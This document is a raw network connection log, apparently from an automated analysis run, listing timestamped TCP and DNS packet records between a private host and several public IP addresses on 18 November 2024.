                                                                                                                                          Nov 18, 2024 06:47:23.370775938 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.370877028 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:23.372288942 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:23.372387886 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.428014994 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:23.428030014 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.475023985 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:23.665061951 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:23.688311100 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.688519001 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.688608885 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.688674927 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.689188004 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.689222097 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.689248085 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.689265966 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.689321995 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.689920902 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.690233946 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.690300941 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.690314054 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.747072935 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.747087955 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.792046070 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.803766012 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.804076910 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.804112911 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.804143906 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.804171085 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.804219961 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.804687023 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.804996014 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.805043936 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.805063009 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.805130959 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.805198908 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.805435896 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.805454969 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.819751978 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:23.819816113 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.819960117 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:23.820070982 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:23.820091963 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.820166111 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:23.820419073 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:23.820446014 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.820671082 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:23.820748091 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.820822954 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:23.820893049 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:23.820916891 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.821082115 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:23.821118116 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.919047117 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:24.263655901 CET53551171.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.269970894 CET5511753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.275259972 CET53551171.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.275366068 CET5511753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.429112911 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.429475069 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.429491043 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.430955887 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.431035042 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.433605909 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.433847904 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.434834003 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.438241005 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.438247919 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.438611031 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.438644886 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.440167904 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.440232992 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.443079948 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.443229914 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.443237066 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.443259001 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.447385073 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.449364901 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.449372053 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.451023102 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.451118946 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.453452110 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.453527927 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.453557968 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.453619003 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.453763962 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.453769922 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.488445997 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.488466978 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.488923073 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.489043951 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.489063025 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.489100933 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.505026102 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.537009001 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.538036108 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.563466072 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.589641094 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.589736938 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.589884043 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.589911938 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590280056 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590289116 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590338945 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590367079 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.590383053 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590431929 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.590435982 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.590831995 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.591082096 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.591447115 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.591495037 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.591509104 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.595753908 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.595753908 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.595802069 CET44355119104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.595873117 CET55119443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.600568056 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.600651979 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.600868940 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.601314068 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:24.601347923 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.616044044 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.632709026 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.632721901 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.645833969 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.679054976 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.681725979 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681762934 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681811094 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681830883 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681829929 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.681859970 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681879044 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.681890011 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.681932926 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.685033083 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.685055017 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.685096979 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.685122013 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.685152054 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.685189009 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.685374022 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.687345028 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.706449986 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.706634045 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.706698895 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.706743002 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.707201004 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.707273006 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.707285881 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.707482100 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.707552910 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.707564116 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.707923889 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.708009958 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.708022118 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.708698988 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.708827972 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.708844900 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.709027052 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.709095955 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.709106922 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.709604025 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.709687948 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.709698915 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.710613012 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.710704088 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.710715055 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.711008072 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.711064100 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.711074114 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.711159945 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.711222887 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.711234093 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.758095980 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.798852921 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.798914909 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.799005032 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.799025059 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.799062014 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.799082994 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.801332951 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.801377058 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.801429033 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.801435947 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.801479101 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.801498890 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.804999113 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.805047035 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.805084944 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.805092096 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.805152893 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.805819035 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.805901051 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.805906057 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.805984020 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.806071043 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.806204081 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.806221008 CET44355118151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.806231976 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.806277990 CET55118443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.819041967 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.819092989 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.819199085 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.819482088 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:24.819516897 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.823431015 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.823549032 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.823893070 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.823980093 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.824042082 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.824042082 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.824114084 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.824510098 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.824635983 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.824645042 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.824723959 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.824949980 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.825197935 CET55120443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.825222015 CET44355120104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.836901903 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.836941957 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.837718010 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.837718010 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:24.837769032 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.869040012 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:24.889390945 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.889442921 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.889517069 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.889642000 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.889657021 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.889672041 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.889678001 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.932168961 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.932266951 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.932379961 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.933640957 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:24.933676004 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.212562084 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.212924957 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.212970018 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.213359118 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.213804007 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.213884115 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.213973045 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.255353928 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.349877119 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350136995 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350231886 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350307941 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.350318909 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350348949 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350379944 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.350508928 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350593090 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.350611925 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350752115 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.350810051 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.350824118 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.391027927 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.391047001 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.429936886 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.430279970 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.430299044 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.434633970 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.434762955 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.435245037 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.435457945 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.435602903 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.435615063 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.438195944 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.454471111 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.454933882 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.454946995 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.456033945 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.456145048 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.456453085 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.456518888 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.456569910 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.466394901 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.466589928 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.466675997 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.466692924 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.466934919 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467087030 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.467101097 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467169046 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467392921 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.467405081 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467705011 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467770100 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.467783928 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467868090 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.467920065 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.467932940 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.468545914 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.468626976 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.468640089 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.468719959 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.468774080 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.468787909 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.468977928 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.469034910 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.469048023 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.469516039 CET44355122104.18.95.41192.168.2.16
